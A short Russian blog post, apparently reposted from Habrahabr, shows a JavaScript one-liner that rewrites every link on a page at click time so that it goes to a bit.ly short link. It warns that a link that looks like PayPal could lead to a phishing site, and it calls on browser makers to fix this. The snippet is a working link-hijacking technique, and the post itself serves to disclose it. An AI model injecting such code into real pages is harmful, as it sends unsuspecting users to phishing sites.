Взлом тега кодом в сто символов

от автора

Просто взгляните на этот код.

// Uncompressed var links = document.links; for(i in links) {     links[i].onclick = function(){         this.href = 'http://bit.ly/141nisR';     }; }  // Compressed (was 100; now 67 characters exc. the link) // Thanks to sgoel from HN o=document.links;for(i in o){o[i].onclick=function(){this.href='//bit.ly/141nisR'}} 

Простая ссылка, ведущая, к примеру, на PayPall, может уже после нажатия стать ссылкой на фишинговый сайт.

Источник и призыв разработчикам браузеров прикрыть эту уязвимость — bilaw.al

ссылка на оригинал статьи http://habrahabr.ru/post/173695/


Комментарии

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *